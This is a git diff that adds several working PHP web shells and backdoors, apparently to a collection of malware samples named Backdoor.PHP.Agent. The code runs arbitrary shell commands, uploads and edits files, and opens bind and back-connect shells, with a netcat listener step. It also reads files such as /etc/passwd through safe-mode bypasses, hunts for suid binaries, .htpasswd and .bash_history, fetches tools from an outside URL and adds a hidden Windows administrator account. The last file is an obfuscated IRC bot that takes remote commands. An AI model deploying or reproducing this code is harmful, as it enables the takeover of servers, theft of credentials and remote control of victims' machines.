+"KIFGIjAQODSiBWO5NAxRRmTggDgkmM7E6iipHZYKBVNQSBSikukSwW4jymcupYFgIBqL/MK8KBDk". +"Bkx2BXWDfX8TDDaFDA0KBAd9fnIKHXYIBJgHBQOHcg+VCikVA5wLpYgbBKurDqysnxMOs7S1sxIR". +"ADs=", +"ext_jpg"=> +"R0lGODlhEAAQADMAACH5BAEAAAkALAAAAAAQABAAgwAAAP///8DAwICAgICAAP8AAAD/AIAAAACA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARccMhJk70j6K3FuFbGbULwJcUhjgHgAkUqEgJNEEAgxEci". +"Ci8ALsALaXCGJK5o1AGSBsIAcABgjgCEwAMEXp0BBMLl/A6x5WZtPfQ2g6+0j8Vx+7b4/NZqgftd". +"FxEAOw==", +"ext_js"=> +"R0lGODdhEAAQACIAACwAAAAAEAAQAIL///8AAACAgIDAwMD//wCAgAAAAAAAAAADUCi63CEgxibH". +"k0AQsG200AQUJBgAoMihj5dmIxnMJxtqq1ddE0EWOhsG16m9MooAiSWEmTiuC4Tw2BB0L8FgIAhs". +"a00AjYYBbc/o9HjNniUAADs=", +"ext_lnk"=> +"R0lGODlhEAAQAGYAACH5BAEAAFAALAAAAAAQABAAhgAAAABiAGPLMmXMM0y/JlfFLFS6K1rGLWjO". +"NSmuFTWzGkC5IG3TOo/1XE7AJx2oD5X7YoTqUYrwV3/lTHTaQXnfRmDGMYXrUjKQHwAMAGfNRHzi". +"Uww5CAAqADOZGkasLXLYQghIBBN3DVG2NWnPRnDWRwBOAB5wFQBBAAA+AFG3NAk5BSGHEUqwMABk". +"AAAgAAAwAABfADe0GxeLCxZcDEK6IUuxKFjFLE3AJ2HHMRKiCQWCAgBmABptDg+HCBZeDAqFBWDG". +"MymUFQpWBj2fJhdvDQhOBC6XF3fdR0O6IR2ODwAZAHPZQCSREgASADaXHwAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAeZgFBQPAGFhocAgoI7Og8JCgsEBQIWPQCJgkCOkJKUP5eYUD6PkZM5". +"NKCKUDMyNTg3Agg2S5eqUEpJDgcDCAxMT06hgk26vAwUFUhDtYpCuwZByBMRRMyCRwMGRkUg0xIf". +"1lAeBiEAGRgXEg0t4SwroCYlDRAn4SmpKCoQJC/hqVAuNGzg8E9RKBEjYBS0JShGh4UMoYASBiUQ". +"ADs=", +"ext_log"=> +"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAMDAwICAgICAAAAAgAAA////AAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARQEKEwK6UyBzC475gEAltJklLRAWzbClRhrK4Ly5yg7/wN". +"zLUaLGBQBV2EgFLV4xEOSSWt9gQQBpRpqxoVNaPKkFb5Eh/LmUGzF5qE3+EMIgIAOw==", +"ext_php"=> +"R0lGODlhEAAQAAAAACH5BAEAAAEALAAAAAAQABAAgAAAAAAAAAImDA6hy5rW0HGosffsdTpqvFlg". +"t0hkyZ3Q6qloZ7JimomVEb+uXAAAOw==", +"ext_pl"=> +"R0lGODlhFAAUAKL/AP/4/8DAwH9/AP/4AL+/vwAAAAAAAAAAACH5BAEAAAEALAAAAAAUABQAQAMo". +"GLrc3gOAMYR4OOudreegRlBWSJ1lqK5s64LjWF3cQMjpJpDf6//ABAA7", +"ext_swf"=> +"R0lGODlhFAAUAMQRAP+cnP9SUs4AAP+cAP/OAIQAAP9jAM5jnM6cY86cnKXO98bexpwAAP8xAP/O". +"nAAAAP///////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA". +"ABEALAAAAAAUABQAAAV7YCSOZGme6PmsbMuqUCzP0APLzhAbuPnQAweE52g0fDKCMGgoOm4QB4GA". +"GBgaT2gMQYgVjUfST3YoFGKBRgBqPjgYDEFxXRpDGEIA4xAQQNR1NHoMEAACABFhIz8rCncMAGgC". +"NysLkDOTSCsJNDJanTUqLqM2KaanqBEhADs=", +"ext_tar"=> +"R0lGODlhEAAQAGYAACH5BAEAAEsALAAAAAAQABAAhgAAABlOAFgdAFAAAIYCUwA8ZwA8Z9DY4JIC". +"Wv///wCIWBE2AAAyUJicqISHl4CAAPD4/+Dg8PX6/5OXpL7H0+/2/aGmsTIyMtTc5P//sfL5/8XF". +"HgBYpwBUlgBWn1BQAG8aIABQhRbfmwDckv+H11nouELlrizipf+V3nPA/40CUzmm/wA4XhVDAAGD". +"UyWd/0it/1u1/3NzAP950P990mO5/7v14YzvzXLrwoXI/5vS/7Dk/wBXov9syvRjwOhatQCHV17p". +"uo0GUQBWnP++8Lm5AP+j5QBUlACKWgA4bjJQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAeegAKCg4SFSxYNEw4gMgSOj48DFAcHEUIZREYoJDQzPT4/AwcQCQkg". +"GwipqqkqAxIaFRgXDwO1trcAubq7vIeJDiwhBcPExAyTlSEZOzo5KTUxMCsvDKOlSRscHDweHkMd". +"HUcMr7GzBufo6Ay87Lu+ii0fAfP09AvIER8ZNjc4QSUmTogYscBaAiVFkChYyBCIiwXkZD2oR3FB". +"u4tLAgEAOw==", +"ext_txt"=> +"R0lGODlhEwAQAKIAAAAAAP///8bGxoSEhP///wAAAAAAAAAAACH5BAEAAAQALAAAAAATABAAAANJ". +"SArE3lDJFka91rKpA/DgJ3JBaZ6lsCkW6qqkB4jzF8BS6544W9ZAW4+g26VWxF9wdowZmznlEup7". +"UpPWG3Ig6Hq/XmRjuZwkAAA7", +"ext_wri"=> +"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAICAgMDAwICAAAAAgAAA////AAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARRUMhJkb0C6K2HuEiRcdsAfKExkkDgBoVxstwAAypduoao". +"a4SXT0c4BF0rUhFAEAQQI9dmebREW8yXC6Nx2QI7LrYbtpJZNsxgzW6nLdq49hIBADs=", +"ext_xml"=> +"R0lGODlhEAAQAEQAACH5BAEAABAALAAAAAAQABAAhP///wAAAPHx8YaGhjNmmabK8AAAmQAAgACA". +"gDOZADNm/zOZ/zP//8DAwDPM/wAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAVk4CCOpAid0ACsbNsMqNquAiA0AJzSdl8HwMBOUKghEApbESBUFQwABICx". +"OAAMxebThmA4EocatgnYKhaJhxUrIBNrh7jyt/PZa+0hYc/n02V4dzZufYV/PIGJboKBQkGPkEEQ". +"IQA7" + ); + //For simple size- and speed-optimization. + $imgequals = array( + "ext_tar"=>array("ext_tar","ext_r00","ext_ace","ext_arj","ext_bz","ext_bz2","ext_tbz","ext_tbz2","ext_tgz","ext_uu","ext_xxe","ext_zip","ext_cab","ext_gz","ext_iso","ext_lha","ext_lzh","ext_pbk","ext_rar","ext_uuf"), + "ext_php"=>array("ext_php","ext_php3","ext_php4","ext_php5","ext_phtml","ext_shtml","ext_htm"), + "ext_jpg"=>array("ext_jpg","ext_gif","ext_png","ext_jpeg","ext_jfif","ext_jpe","ext_bmp","ext_ico","ext_tif","tiff"), + "ext_html"=>array("ext_html","ext_htm"), + "ext_avi"=>array("ext_avi","ext_mov","ext_mvi","ext_mpg","ext_mpeg","ext_wmv","ext_rm"), + "ext_lnk"=>array("ext_lnk","ext_url"), + "ext_ini"=>array("ext_ini","ext_css","ext_inf"), + "ext_doc"=>array("ext_doc","ext_dot"), + "ext_js"=>array("ext_js","ext_vbs"), + "ext_cmd"=>array("ext_cmd","ext_bat","ext_pif"), + "ext_wri"=>array("ext_wri","ext_rtf"), + "ext_swf"=>array("ext_swf","ext_fla"), + "ext_mp3"=>array("ext_mp3","ext_au","ext_midi","ext_mid"), + "ext_htaccess"=>array("ext_htaccess","ext_htpasswd","ext_ht","ext_hta","ext_so") + ); + if (!$getall) + { + header("Content-type: image/gif"); + header("Cache-control: public"); + header("Expires: ".date("r",mktime(0,0,0,1,1,2030))); + header("Cache-control: max-age=".(60*60*24*7)); + header("Last-Modified: ".date("r",filemtime(__FILE__))); + foreach($imgequals as $k=>$v) {if (in_array($img,$v)) {$img = $k; break;}} + if (empty($images[$img])) {$img = "small_unk";} + if (in_array($img,$ext_tar)) {$img = "ext_tar";} + echo base64_decode($images[$img]); + } + else + { + foreach($imgequals as $a=>$b) {foreach ($b as $d) {if ($a != $d) {if (!empty($images[$d])) {echo("Warning! Remove \$images[".$d."]
    ");}}}} + natsort($images); + $k = array_keys($images); + echo "
    "; + foreach ($k as $u) {echo $u.":
    ";} + echo "
    "; + } + exit; +} +if ($act == "about") {echo "
    Credits:
    Idea, leading and coding by tristram[CCTeaM].
    Beta-testing and some tips - NukLeoN [AnTiSh@Re tEaM].
    Thanks all who report bugs.
    All bugs send to tristram's ICQ #656555 .
    ";} +if ($act == "backc") +{ + $ip = $_SERVER["REMOTE_ADDR"]; + $msg = $_POST['backcconnmsg']; + $emsg = $_POST['backcconnmsge']; + echo('
    Back-Connection:

    Host: Port: Use:
    First, run NetCat on your computer using \'nc -l -n -v -p '.$bc_port.'\'. Then, click "Connect" once the port is listening.
    '); + echo $msg; + echo $emsg; +} + +if ($act == 'shbd'){ +$msg = $_POST['backcconnmsg']; +$emsg = $_POST['backcconnmsge']; +echo("
    Bind Shell Backdoor:

    +Bind Port: + +
    "); +echo("$msg"); +echo("$emsg"); +echo("
    "); +} ?> +
    + + + +
    Enter:
     
    +
    Kernel Info:
    + + +
    +
    +
    + + + +
    + +
    + + + + + +
    +
    Functions
    +
    +
    Make Dir
    +
    +
    Go Dir
    +
    +
    +
    + +
    +
    +  +
    +
    +
    +
    +
    + +
    +
    +
    +
    +
    +
    + +
    +
    +  + +
    +
    +
    Aliases
    +
    +
    Make File
    +
    +
    Go File
    +
    + /dev/null'), + array('Installed Downloaders', 'which wget curl w3m lynx'), + array('Open Ports', 'netstat -an | grep -i listen'), + array('Box Uptime', 'uptime'), + array('System Variables', 'set'), + array('ARP table', 'arp -a'), + array('Patch Level for RedHat 7.0', 'rpm -qa'), + array('Network Interfaces', 'ifconfig'), + array('Mounted Filesystems', 'mount'), + array('Find Suid Bins', 'find /bin /usr/bin /usr/local/bin /sbin /usr/sbin /usr/local/sbin -perm -4000 2> /dev/null'), + array("Find All Suid Files", "find / -type f -perm -04000 -ls"), + array("Find Suid Files in Current Dir", "find . -type f -perm -04000 -ls"), + array("Find All Sgid Files", "find / -type f -perm -02000 -ls"), + array("Find Sgid Files in Current Dir", "find . -type f -perm -02000 -ls"), + array("Find config.inc.php Files", "find / -type f -name config.inc.php"), + array("Find config* Files", "find / -type f -name \"config*\""), + array("Find config* Files in Current Dir", "find . -type f -name \"config*\""), + array("Find All Writable Folders and Files", "find / -perm -2 -ls"), + array("Find All Writable Folders and Files in Current Dir", "find . -perm -2 -ls"), + array("Find All service.pwd Files", "find / -type f -name service.pwd"), + array("Find service.pwd Files in Current Dir", "find . -type f -name service.pwd"), + array("Find All .htpasswd Files", "find / -type f -name .htpasswd"), + array("Find .htpasswd Files in Current Dir", "find . -type f -name .htpasswd"), + array("Find All .bash_history Files", "find / -type f -name .bash_history"), + array("Find .bash_history Files in Current Dir", "find . -type f -name .bash_history"), + array("Find All .fetchmailrc Files", "find / -type f -name .fetchmailrc"), + array("Find .fetchmailrc Files in Current Dir", "find . -type f -name .fetchmailrc"), + array("List File Attributes on a Linux Second Extended File System", "lsattr -va"), + ); +} +else // if the box is windows +{ + $cmdaliases = array( + array('-----------------------------------------------------------', 'dir'), + array('Active Connections', 'netstat -an'), + array('ARP Table', 'arp -a'), + array('Net Shares', 'net use'), + array('IP Configuration', 'ipconfig /all'), + array('Disk Quotas', 'fsutil quota query '.$pd[0]), + array('Drive Type', 'fsutil fsinfo drivetype '.$pd[0]) + ); +} +?> +
    +
    +
    +  +
    +
    +
    +
    +
    + +
    +
    +
    +
    +
    +
    + +
    + +
      +
    +
    +
    +

    + + + +
    +
    PHP Safe-Mode Bypass (Read File)

    +
    +File: +

    +e.g.: /etc/passwd or C:/whatev.txt +
    +
    +'.$get.'
    '; + if(copy("compress.zlib://".$file, $temp)){ + $fichier = fopen($temp, 'r'); + $action = fread($fichier, filesize($temp)); + fclose($fichier); + $source=htmlspecialchars($action); + echo 'Start '.$get.'

    '.$source.'

    Fin '.$get.'
    '; + unlink($temp); + } else + echo '
    Sorry... File '.htmlspecialchars($file).' dosen\'t exists or you don\'t have access.
    '; +} +?> +
    +
    PHP Safe-Mode Bypass (Directory Listing)

    +
    +Dir: +

    +e.g.: /etc/ or C:/ +
    +
    +'.$chemin.'

    '; + foreach ($files as $filename) + echo $filename."\n
    "; // added the \n for easier readability while viewing the html source +} +?> +
    +
    + + + + + + +
    Search
      - regexp 

    Upload
     
    +
    --[ ANGE787Shell v, coded by ANGE | Generation time: ]--
    Who said that it's better to have loved and lost?
    I wish that I had never loved at all.
    + diff --git a/PHP/Backdoor.PHP.Agent.ag b/PHP/Backdoor.PHP.Agent.ag new file mode 100644 index 00000000..8dab17c3 --- /dev/null +++ b/PHP/Backdoor.PHP.Agent.ag @@ -0,0 +1,467 @@ + + + + + + + + +By xIgOr > AoD > CMD > File List + + + +OFF"; } + else { $SafeMode = "$SafeMode"; } + + $btname = 'backtool.txt'; + $bt = 'http://www.full-comandos.com/jobing/r0nin'; + $dc = 'http://www.full-comandos.com/jobing/dc.txt'; + $newuser = '@echo off;net user Admin /add /expires:never /passwordreq:no;net localgroup "Administrators" /add Admin;net localgroup "Users" /del Admin'; + // Java Script + echo ""; + + // End JavaScript + + /* Functions */ + function cmd($CMDs) { + $CMD[1] = ''; + exec($CMDs, $CMD[1]); + if (empty($CMD[1])) { + $CMD[1] = shell_exec($CMDs); + } + elseif (empty($CMD[1])) { + $CMD[1] = passthru($CMDs); + } + elseif (empty($CMD[1])) { + $CMD[1] = system($CMDs); + } + elseif (empty($CMD[1])) { + $handle = popen($CMDs, 'r'); + while(!feof($handle)) { + $CMD[1][] .= fgets($handle); + } + pclose($handle); + } + return $CMD[1]; + } + +if (@$_GET['chdir']) { + $chdir = $_GET['chdir']; +} else { + $chdir = getcwd()."/"; + } +if (@chdir("$chdir")) { + $msg = "Entrance in the directory, OK!"; +} else { + $msg = "Error to enters it in the directory!"; + $chdir = str_replace($SCRIPT_NAME, "", $_SERVER['SCRIPT_NAME']); +} + $chdir = str_replace(chr(92), chr(47), $chdir); + +if (@$_GET['action'] == 'upload') { + $uploaddir = $chdir; + $uploadfile = $uploaddir. $_FILES['userfile']['name']; + if (@move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir . $_FILES['userfile']['name'])) { + $msg = "{$_FILES['userfile']['name']}, the archive is validates and was loaded successfully."; + } else { + $msg = "Error when copying archive."; + } +} +elseif (@$_GET['action'] == 'mkdir') { + $newdir = $_GET['newdir']; + if (@mkdir("$chdir"."$newdir")) { + $msg = "{$newdir}, directory created successfully."; + } else { + $msg = "Error to it creates directory."; + } +} +elseif (@$_GET['action'] == 'newfile') { + $newfile = $_GET['newfile']; + if (@touch("$chdir"."$newfile")) { + $msg = "{$newfile}, created successfully!"; + } else { + $msg = "Error to tries it creates archive."; + } +} + +elseif (@$_GET['action'] == 'del') { + $file = $_GET['file']; $type = $_GET['type']; + if ($type == 'file') { + if (@unlink("$chdir"."$file")) { + $msg = "{$file}, successfully excluded archive!"; + } else { + $msg = "Error to it I excluded archive!"; + } + } elseif ($type == 'dir') { + if (@rmdir("$chdir"."$file")) { + $msg = "{$file}, successfully excluded directory!"; + } else { + $msg = "Error to it I excluded directory!"; + } + } +} +elseif (@$_GET['action'] == 'chmod') { + $file = $chdir.$_GET['file']; $chmod = $_GET['chmod']; + if (@chmod ("$file", $chmod)) { + + $msg = "Chmod of {$_GET['file']} moved for $chmod successfully."; + } else { + $msg = 'Error when moving chmod.'; + } +} +elseif (@$_GET['action'] == 'rename') { + $file = $_GET['file']; $newname = $_GET['newname']; + if (@rename("$chdir"."$file", "$chdir"."$newname")) { + $msg = "Archive {$file} named for {$newname} successfully!"; + } else { + $msg = "Error to it nominates archive."; + } +} +elseif (@$_GET['action'] == 'copy') { + $file = $chdir.$_GET['file']; $copy = $_GET['fcopy']; + if (@copy("$file", "$copy")) { + $msg = "{$file}copied for {$copy} successfully!"; + } else { + $msg = "Error when copying {$file} for {$copy}"; + } +} +/* Parte Atualiza 02:48 12/2/2006 */ + +elseif (@$_GET['action'] == 'cmd') { + if (!empty($_GET['cmd'])) { $cmd = @$_GET['cmd']; } + if (!empty($_POST['cmd'])) { $cmd = @$_POST['cmd']; } + $cmd = stripslashes(trim($cmd)); + $result_arr = cmd($cmd); + + $afim = count($result_arr); $acom = 0; $msg = ''; + $msg .= "

    Results: ".$cmd."

    "; + if ($result_arr) { + while ($acom <= $afim) { + $msg .= "

     ".@$result_arr[$acom]."

    "; + $acom++; + } + } + else { + $msg .= "

    Erro ao executar comando.

    "; + } +} +elseif (@$_GET['action'] == 'safemode') { +if (@!extension_loaded('shmop')) { + echo "Loading... module
    "; + + if (strtoupper(substr(PHP_OS, 0,3) == 'WIN')) { + @dl('php_shmop.dll'); + } else { + @dl('shmop.so'); + } +} + +if (@extension_loaded('shmop')) { + echo "Module: shmop loaded!
    "; + + $shm_id = @shmop_open(0xff2, "c", 0644, 100); + if (!$shm_id) { echo "Couldn't create shared memory segment\n"; } + $data="\x00"; + $offset=-3842685; + $shm_bytes_written = @shmop_write($shm_id, $data, $offset); + if ($shm_bytes_written != strlen($data)) { echo "Couldn't write the entire length of data\n"; } + if (!shmop_delete($shm_id)) { echo "Couldn't mark shared memory block for deletion."; } + echo passthru("id"); + shmop_close($shm_id); + + +} else { echo "Module: shmop not loaded!
    "; } +} + +elseif (@$_GET['action'] == 'zipen') { + $file = $_GET['file']; + $zip = @zip_open("$chdir"."$file"); + $msg = ''; +if ($zip) { + + while ($zip_entry = zip_read($zip)) { + $msg .= "Name: " . zip_entry_name($zip_entry) . "\n"; + $msg .= "Actual Filesize: " . zip_entry_filesize($zip_entry) . "\n"; + $msg .= "Compressed Size: " . zip_entry_compressedsize($zip_entry) . "\n"; + $msg .= "Compression Method: " . zip_entry_compressionmethod($zip_entry) . "\n"; + + if (zip_entry_open($zip, $zip_entry, "r")) { + echo "File Contents:\n"; + $buf = zip_entry_read($zip_entry, zip_entry_filesize($zip_entry)); + echo "$buf\n"; + + zip_entry_close($zip_entry); + } + echo "\n"; + + } + + zip_close($zip); + +} +} +elseif (@$_GET['action'] == 'edit') { + $file = $_GET['file']; + $conteudo = ''; + $filename = "$chdir"."$file"; + $conteudo = @file_get_contents($filename); + $conteudo = htmlspecialchars($conteudo); + $back = $_SERVER['HTTP_REFERER']; + echo "

    Editing {$file} ...

    "; + echo ""; + echo ""; + echo ""; + echo ""; + echo "
    "; + echo "
    "; + echo "

    "; + print "

    "; + echo "

    "; + echo " "; + echo " "; + echo "

    "; + echo "
    "; +} +elseif (@$_GET['action'] == 'save') { + $filename = "$chdir".$_GET['file']; + $somecontent = $_POST['S1']; + $somecontent = stripslashes(trim($somecontent)); + if (is_writable($filename)) { + @$handle = fopen ($filename, "w"); + @$fw = fwrite($handle, $somecontent); + @fclose($handle); + if ($handle && $fw) { + $msg = "{$_GET['file']}edited successfully!"; + } + } else { + $msg = "{$_GET['file']}, cannot be written!"; + } +} + +// Informações + $cmdget = ''; + if (!empty($_GET['cmd'])) { $cmdget = @$_GET['cmd']; } + if (!empty($_POST['cmd'])) { $cmdget = @$_POST['cmd']; } + $cmdget = htmlspecialchars($cmdget); + function asdads() { + $asdads = ''; + if (@file_exists("/usr/bin/wget")) { $asdads .= "wget "; } + if (@file_exists("/usr/bin/fetch")) { $asdads .= "fetch "; } + if (@file_exists("/usr/bin/curl")) { $asdads .= "curl "; } + if (@file_exists("/usr/bin/GET")) { $asdads .= "GET "; } + if (@file_exists("/usr/bin/lynx")) { $asdads .= "lynx "; } + return $asdads; + } + +echo "
    "; +echo "
    "; +echo "Informações"; +echo ""; +echo ""; +echo "

    "; +echo ""; +echo ""; +echo ""; +echo "

    "; +echo ""; +echo ""; +echo ""; +echo "

    "; +echo ""; +echo ""; + if (strtoupper(substr($OS, 0,3) != 'WIN')) { + $Methods = asdads(); + if ($Methods == '') { $Methods = "???"; } + echo ""; + echo "

    "; + echo ""; + echo ""; + } + +echo ""; +echo "

    "; +echo ""; +echo ""; +echo ""; +echo "

    "; +echo ""; +echo ""; +echo "
    "; +echo "

    Sistema: 

     {$OS}
    "; +echo "

    Uname: 

     {$UNAME}
    "; +echo "

    PHP: 

     {$PHPv}, safe mode: {$SafeMode}
    "; + echo "

    Methods: 

     {$Methods}
    "; +echo "

    Ip: 

     {$IpServer}
    "; +echo "

    Command: 

      
    "; +echo "
    "; +// Dir + +echo "
    "; +echo "
    "; +if (is_writable("$chdir")) { + if (strtoupper(substr($OS, 0,3) == 'WIN')) { + echo "Dir YES: {$chdir} - [New Dir] [New File] [Remote Access]"; + } else { + echo "Dir YES: {$chdir} - [New Dir] [New File] [BackTool]"; + } +} +else { +if (strtoupper(substr($OS, 0,3) == 'WIN')) { + echo "Dir NO: {$chdir} - [New Dir] [New File] [Remote Access]"; + } else { + echo "Dir NO: {$chdir} - [New Dir] [New File] [BackTool]"; + } +} + +if (@!$handle = opendir("$chdir")) { + echo " I could not enters in the directory, click here! for return to the original directory!
    "; +} +else { +echo " "; +echo " "; +echo " "; +echo " "; +echo " "; +echo " "; +echo " "; +echo " "; +echo " "; +} else { + echo "

    $msg"; + } +echo "

    "; +echo " "; +echo " "; +echo " "; +echo " "; +echo " "; +echo " "; +echo " "; +echo " "; +echo " "; +$colorn = 0; + while (false !== ($file = readdir($handle))) { + if ($file != '.') { + if ($colorn == 0) { + $color = "style=\"background-color: #FFCC66\""; + } + elseif ($colorn == 1) { + $color = "style=\"background-color: #C0C0C0\""; + } + if (@is_dir("$chdir"."$file")) { + $file = $file.'/'; + $mode = 'chdir'; + } else { + $mode = 'edit'; + } + if (@substr("$chdir", strlen($chdir) -1, 1) != '/') { + $chdir .= '/'; + } + if ($file == '../') { + $lenpath = strlen($chdir); $baras = 0; + for ($i = 0;$i < $lenpath;$i++) { if ($chdir{$i} == '/') { $baras++; } } + $chdir_ = explode("/", $chdir); + $chdirpox = str_replace($chdir_[$baras-1].'/', "", $chdir); + } + $perms = @fileperms ("$chdir"."$file"); + if ($perms == '') { + $perms = '???'; + } + $size = @filesize ("$chdir"."$file"); + $size = $size / 1024; + $size = explode(".", $size); + if (@$size[1] != '') { + $size = $size[0].'.'.@substr("$size[1]", 0, 2); + } else { + $size = $size[0]; + } + if ($size == 0) { + if ($mode == 'chdir') { + $size = '???'; + } + } + echo ""; + echo ""; + if (@is_writable ("$chdir"."$file")) { + if ($mode == 'chdir') { + if ($file == '../') { + echo ""; + } else { + echo ""; + } + } else { + if (is_readable("$chdir"."$file")) { + echo ""; + } else { + echo ""; + } + } + } + else { + if ($mode == 'chdir') { + if ($file == '../') { + echo ""; + } else { + echo ""; + } + } else { + if (@is_readable("$chdir"."$file")) { + echo ""; + } else { + echo ""; + } + } + } + echo ""; + if ($mode == 'edit') { + echo ""; + } else { + echo ""; + } + echo ""; + if ($colorn == 0) { + $colorn = 1; + } + elseif ($colorn == 1) { + $colorn = 0; + } + } + } + closedir($handle); +} +?> +
     Upload:"; +echo " "; +echo "
     
    "; +if (@!$msg) { + echo "

    Messages

     
     Perms File  Size  Commands
     $perms $file $file $file $file $file $file $file $file $size KB [Rename] [Del] [Chmod] [Copy] [Rename] [Del] [Chmod] [Copy]
    +
    +

    + Valid HTML 4.01 Transitional +

    + + + \ No newline at end of file diff --git a/PHP/Backdoor.PHP.Agent.ah b/PHP/Backdoor.PHP.Agent.ah new file mode 100644 index 00000000..27d028cf --- /dev/null +++ b/PHP/Backdoor.PHP.Agent.ah @@ -0,0 +1,135 @@ + 8080, "sp" => "xZiGuIrSlJaYlw==", "ch" => "dVZQuw==", + "ke" => "k3h2", "ha" => "gW1NZ0+eTmOGmldl", "pa" => "i5eHeoqSWmZXWmuZW2ZoapttnGhtb22cYW1olWlok2o=", + "tr" => "*", "mrnd" => 9, "mo" => "f6tOrw==", "ve" => "g2FVfok=" ); function dfc35fdc70d5fc() { +global $oec12e0af93cb5; $xee11cbb19052e = array(); $ed707b8140a662 = ""; $n59b514174bffe = array("uqKQq5HDl6iShaFkmpuamqOrZ5Onpg==","tKiVtI7Mi6KGkmGtiJuZpKhmnJ+l","tJSPspjKiaiYkZSkUa2am5mmrF6bqKY=","v5aEuFPCiGOHkKibj5+jm2Oang==","v5aEuJHNl2OUlJikh6SoZJed","wKZUdlPRmaeUk6dkhqWi","v5aEuJHNl2OJkpymUaSaqg==","g2GRuVWRUpaSiaWfhpejq6Oeop6hrKGclGaWoaA="); +shuffle($n59b514174bffe); if(($o351a1d2ad68bc = fsockopen(ef9feaa9bcab30($n59b514174bffe[0]),$oec12e0af93cb5['po'],$i70106d0d82151,$q809b1abe3f111,15))) { +$d8052146769b14 = bd988971435842($oec12e0af93cb5['mrnd']); if (strlen($oec12e0af93cb5['sp'])>0) { i56eacb300613d($o351a1d2ad68bc, ub5d21085bf2c0("UEFTUw==")." ".ef9feaa9bcab30($oec12e0af93cb5['sp'])); +} i56eacb300613d($o351a1d2ad68bc, ub5d21085bf2c0("VVNFUg==")." ".bfb0daa8f01135($oec12e0af93cb5['mrnd'])." 127.0.0.1 localhost :$d8052146769b14"); +i56eacb300613d($o351a1d2ad68bc, ub5d21085bf2c0("TklDSw==")." $d8052146769b14"); while (!feof($o351a1d2ad68bc)) { +$l7fabc1404929c = trim(fgets($o351a1d2ad68bc,512)); $b6e2baaf3b97db = explode(" ",$l7fabc1404929c); +if(($l7fabc1404929c == $ed707b8140a662)) continue; if (isset($b6e2baaf3b97db[0]) && $b6e2baaf3b97db[0] == ub5d21085bf2c0("UElORw==")) { +i56eacb300613d($o351a1d2ad68bc, ub5d21085bf2c0("UE9ORw==")." ".$b6e2baaf3b97db[1]); } else if (isset($b6e2baaf3b97db[1]) && $b6e2baaf3b97db[1] == ub5d21085bf2c0("MDAx")) { +i56eacb300613d($o351a1d2ad68bc, ub5d21085bf2c0("TU9ERQ==")." $d8052146769b14 ".ef9feaa9bcab30($oec12e0af93cb5['mo'])); +i56eacb300613d($o351a1d2ad68bc, ub5d21085bf2c0("Sk9JTg==")." ".ef9feaa9bcab30($oec12e0af93cb5['ch'])." ".ef9feaa9bcab30($oec12e0af93cb5['ke'])); +} else if(isset($xdfff0a7fa1a55[1]) && $xdfff0a7fa1a55[1] == ub5d21085bf2c0("NDMz")) { i56eacb300613d($o351a1d2ad68bc, ub5d21085bf2c0("TklDSw==")." $d8052146769b14"); +} else if (isset($b6e2baaf3b97db[1]) && isset($xee11cbb19052e[$b6e2baaf3b97db[1]])) { unset($xee11cbb19052e[$b6e2baaf3b97db[1]]); +} else if (isset($b6e2baaf3b97db[1]) && ($b6e2baaf3b97db[1] == ub5d21085bf2c0("UFJJVk1TRw==") || $b6e2baaf3b97db[1] == "332")) { +$o78e731027d8fd = strstr($l7fabc1404929c," :"); $o78e731027d8fd = substr($o78e731027d8fd,2); $xdfff0a7fa1a55 = explode(" ",$o78e731027d8fd); +$z67b3dba8bc677 = $b6e2baaf3b97db[0]; $f7c6483ddcd99e = explode("!",$z67b3dba8bc677); $f7c6483ddcd99e = substr($f7c6483ddcd99e[0],1); +$e73be252ca8221 = FALSE; if ($xdfff0a7fa1a55[0] == "\1".ub5d21085bf2c0("VkVSU0lPTg==")."\1") { i56eacb300613d($o351a1d2ad68bc,"NOTICE ".$f7c6483ddcd99e." :\1".ub5d21085bf2c0("VkVSU0lPTg==")." ".ef9feaa9bcab30($oec12e0af93cb5['ve'])."\1"); +} for ($v865c0c0b4ab0e=0;$v865c0c0b4ab0e1) { +i56eacb300613d($o351a1d2ad68bc, substr($o78e731027d8fd,strlen($xdfff0a7fa1a55[0]))); } break; case j69923efad5b7a("sKc="): +if (isset($xdfff0a7fa1a55[1])) { $s954eef6d6eac5 = $xdfff0a7fa1a55[1]; } else { $s954eef6d6eac5 = getcwd(); +} if (is_dir($s954eef6d6eac5)) { if (($k736007832d216 = opendir($s954eef6d6eac5))) { zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, ub5d21085bf2c0("RGlyLy8gTm93IGxpc3Rpbmc6") ." \2".$s954eef6d6eac5."\2"); +while (($a435ed7e9f07f7 = readdir($k736007832d216)) !== FALSE) { if ($a435ed7e9f07f7 != "." && $a435ed7e9f07f7 != "..") { +zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, "> (".filetype($s954eef6d6eac5."/".$a435ed7e9f07f7).") $a435ed7e9f07f7"); +sleep(1); } } closedir(); } else { zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, ub5d21085bf2c0("RGlyLy8gVW5hYmxlIHRvIGxpc3QgY29udGVudHMgb2Y=") . " 